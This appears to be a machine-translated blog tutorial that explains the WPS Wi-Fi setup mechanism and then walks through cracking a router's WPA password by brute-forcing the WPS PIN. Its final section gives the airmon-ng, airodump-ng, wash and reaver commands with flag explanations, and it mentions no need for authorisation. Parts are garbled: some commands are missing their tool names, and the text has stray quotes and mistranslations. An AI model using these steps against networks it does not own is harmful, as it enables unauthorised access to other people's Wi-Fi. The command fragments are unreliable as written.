1. WPS Authentication Mechanism
WPS (Wi-Fi Protected Setup,wi-fi protection settings) (some are called AOSs, some are called QSS, but the functions are consistent. ) is a certification program implemented by the Wi-Fi Alliance organization, focusing on simplifying the installation and security performance of WLAN. In the traditional way, when a user creates a new wireless network, they must manually set the network name (SSID) and security key at the access point, and then verify the key on the client side to prevent intruder intrusion. This entire process requires the user to have background knowledge of the Wi-Fi device and the ability to modify the necessary configuration. Wi-Fi Protected Setup helps users to automatically set the network name (SSID), configure a powerful WPA data encoding and authentication feature, and users simply enter a personal Information code (PIN method) or press the button (Button settings, or PBC) to securely connect to the WLAN. This greatly simplifies the operation of wireless security settings. Wi-Fi Protected Setup supports multiple Wi-Fi certified 802.11 products, including access points, wireless adapters, Wi-Fi phones, and other consumer electronic devices.
WPS can help client users automatically configure the network name (SSID) and wireless encryption key. For ordinary users, the need to understand the concept of SSID and security key to achieve a secure connection, and the user's security key can not be cracked by outsiders, because it is randomly generated, the most important is that users do not have to remember the lengthy wireless encryption password, to avoid the trouble of forgetting the password.
- WPS Certified AP Operating Instructions
1, in support of WPS AP device will generally have a button, press this button, in a certain time (usually 120s) it will wait for the customer device connection. In the Web page management interface also has the corresponding operation, the two choose one can.
2. Press the WPS Connection button (some qss, aoss, etc.) of the network card device to connect the AP. (You can also enter a PIN code connection, you need the AP to do the corresponding settings).
3, wireless network card and WPS certified AP established connection.
WPS connection operation such as Diagram-wps diagram schematic
2. Connect the WPS mechanism to the WiFi authentication process
- Not all phone models and ROMs support WPS-certified network Connections, some of which are supported by the K-touch w806 (Bumblebee) For example, say something about the phone's connection to WPS.
Under "Settings"--"Wireless and Network"--"WLAN settings", there is an option to add a WPS network, click There will be two options, respectively, two access methods, one is to enter the PIN code, the other is the key.
After the connection is successful, the router (AP) management page appears as follows:
use Wireshark for analysis. By setting the filter, you can see the general process of the WPS authentication connection.
To draw a flowchart, the approximate process is as follows:
3. WiFi Password cracking process
Open Terminal input ifconfig wlan0 up "to load the USB card.
ifconfig wlan0 up
The next "airmon-ng start Wlan0" Listening mode has been activated to mon0.
airmon-ng start wlan0
Note: Wlan0 is not necessarily fixed, plug in other USB card system will be automatically named Wlan1,wlan2. The USB card requires system support. Recommended RTF8187 series, my pro-test stability is available.
View information about the perimeter-routed AP. Record the routing MAC address you want to learn.
airodump-ng mon0”
Special NOTE: Only the AP opens the WPS, QSS function, can use the Pin method to learn the PSK password!
Use the Wash command to view the properties of the surrounding wireless WiFi, C is uppercase in the WPS locked an item is displayed
-i-C
Grab PIN pack, enumerate PIN codes
-i-b-a-S-vv
Note :
The colon in the MAC address cannot be omitted, the letter case of MAC address can be,-s is capital letter,-VV
is two v not W!
-I listen after interface name
-B Destination MAC address
-A automatically detects the optimal configuration of the target AP
-s use minimal DH key (can improve PJ speed)
-VV show more non-critical warnings
-D that is, delay is set to 1 seconds per poor time
-T is the maximum time that timeout waits for feedback each time
-C designated channel can easily find the signal, such as-C1 designated Channel 1, you see your target channel to make corresponding changes (non-Tp-link route recommended –D9–T9 parameters to prevent the routing zombie
Reaver-i mon0-b mac-a-s–d9–t9-vv).
The rest is a long wait, to have patience!!!
Good
Wireless WiFi wps authentication mechanism cracked